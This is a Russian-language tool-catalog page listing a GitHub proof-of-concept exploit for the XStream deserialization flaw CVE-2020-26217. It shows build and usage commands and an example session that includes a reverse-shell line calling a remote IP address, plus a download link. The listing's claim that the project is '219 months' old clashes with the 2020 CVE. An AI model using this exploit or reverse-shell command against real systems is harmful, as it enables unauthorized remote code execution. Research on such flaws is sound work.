Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/kairo-one/cve-2020-26217-xstream
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubkairo-one/cve-2020-26217-xstream

CVE-2020-26217-XStream

CVE-2020-26217 XStream反序列化的poc

Репозиторий
219 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-26217 XStream RCE Exploit

Инструмент для эксплуатации уязвимости удаленного выполнения кода XStream.

Описание уязвимости

CVE-2020-26217 — это уязвимость десериализации в библиотеке XStream, которая позволяет злоумышленнику выполнить удаленный код путем создания вредоносных XML-данных.

Затронутые версии: XStream <= 1.4.13

Использование

root@kitploit:~
go run poc.go <目标URL>

Пример

root@kitploit:~
# 运行工具
go run poc.go http://target.com:8080/?data

# 进入交互模式后输入命令
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit

Особенности

  • Интерактивное выполнение команд
  • Автоматический разбор имени параметра URL
  • Кодирование Base64 для обхода фильтрации специальных символов
  • Поддержка HTTPS (пропуск проверки сертификата)

Компиляция

root@kitploit:~
go build -o poc poc.go

Отказ от ответственности

Данный инструмент предназначен только для исследований безопасности и авторизованного тестирования. Не используйте его в незаконных целях. Пользователь несет полную юридическую ответственность.

Скачать инструмент